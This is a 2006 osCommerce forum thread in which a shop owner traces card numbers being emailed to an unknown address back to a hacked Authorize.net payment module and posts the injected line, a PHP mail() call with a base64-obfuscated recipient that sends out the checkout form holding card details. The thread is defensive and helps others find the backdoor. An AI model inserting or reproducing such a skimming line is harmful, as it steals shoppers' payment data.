kgeoffrey Posted September 29, 2006 Posted September 29, 2006 Thanks to an undeliverable message, I discovered that it looks like we have some kind of security hole in an installation of OSC from 2003. What appears to be happening is that a copy of the form values that are supposed to be sent to Authorize.net are also being sent via e-mail to some mysterious address. Here's a sample of the e-mail: To: [email protected] Subject: actualdomain.com [order] Date: Fri, 29 Sep 2006 10:58:03 -0500 X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Original Domain - lmka.net X-AntiAbuse: Originator/Caller UID/GID - [99 32002] / [47 12] X-Source: X-Source-Args: /usr/local/apache/bin/httpd -DSSL X-Source-Dir: actualdomain.com:/public_html/webstore <input type="hidden" name="x_Login" value="the authorize.net login was here!"><input type="hidden" name="x_Card_Num" value="the actual card number was here!!!!"><input type="hidden" name="x_Exp_Date" value="1009"><input type="hidden" name="x_Amount" value="1.00"><input type="hidden" name="x_Method" value="CC"><input type="hidden" name="x_Version" value="3.0"><input type="hidden" name="x_Cust_ID" value="146"><input type="hidden" name="x_Email_Customer" value="FALSE"><input type="hidden" name="x_first_name" value="Darrell"> etc, etc. Any advice as to how to find the problem would be greatly appreciated! Thanks!
kgeoffrey Posted September 29, 2006 Author Posted September 29, 2006 I discoverd that this mysterious e-mail is being sent out when you enter your cc information and click "continue" from checkout_payment.php (using authorize.net module only) The form and information that is sent via e-mail is the same that is in the source code on the next page of the script, checkout_confirmation.php Does anyone know of some kind of vulnerability that would allow this to happen, or how to stop it? Thanks!
kgeoffrey Posted October 1, 2006 Author Posted October 1, 2006 Okay, I believe I found the problem. It appears that includes/modules/payment/authorizenet.php was hacked. The file ID I have for the version installed is: $Id: authorizenet.php,v 1.48 2003/04/10 21:42:30 project3000 Exp $ I compared authorizenet.php across several installations. On the store that had the problem, I found this at line 251: mail(base64_decode('anJzQGlkZWFscmF0ZXMuY29t'), base64_decode('anZtaS5jb20gW29yZGVyXQ=='), $process_button_string); Lines 249-251 should look like: tep_draw_hidden_field('x_Customer_IP', $HTTP_SERVER_VARS['REMOTE_ADDR']) . $this->InsertFP(MODULE_PAYMENT_AUTHORIZENET_LOGIN, MODULE_PAYMENT_AUTHORIZENET_TXNKEY, number_format($order->info['total'], 2), $sequence); if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE'); Mine (lines 249-252) looked like: tep_draw_hidden_field('x_Customer_IP', $HTTP_SERVER_VARS['REMOTE_ADDR']) . $this->InsertFP(MODULE_PAYMENT_AUTHORIZENET_LOGIN, MODULE_PAYMENT_AUTHORIZENET_TXNKEY, number_format($order->info['total'], 2), $sequence); mail(base64_decode('anJzQGlkZWFscmF0ZXMuY29t'), base64_decode('anZtaS5jb20gW29yZGVyXQ=='), $process_button_string); if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE'); My guess is that the hacker used PHP's mail to send himself the contents of the form submitted from checkout_payment.php and encrypted his code to make it unobtrusive. I hope this helps someone else.
mushindo Posted October 1, 2006 Posted October 1, 2006 I don't know if this was a hack job, or I seem to recall one of the earlier versions of that contribution created by the original author....seemed to have that extra email in it so he could get copies of all of the c.c. information from his customers. As you have seen, the more recent versions resolve this. Sincerely, Bruce 19 contributions submitted
kgeoffrey Posted October 1, 2006 Author Posted October 1, 2006 The authorizenet modules that I looked at, both with and without the mail() line, all had identical id's -- $Id: authorizenet.php,v 1.48 2003/04/10 21:42:30 project3000 Exp $ Thanks for your reply.
mushindo Posted October 1, 2006 Posted October 1, 2006 The authorizenet modules that I looked at, both with and without the mail() line, all had identical id's -- $Id: authorizenet.php,v 1.48 2003/04/10 21:42:30 project3000 Exp $ Thanks for your reply. That's cool. Doesn't mean much though, since if I was only removing 1 line of code I would find it pointless to rename it version 1.49 or anything :). As long as it works for you now is what is most important, right? Sincerely, Bruce 19 contributions submitted
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.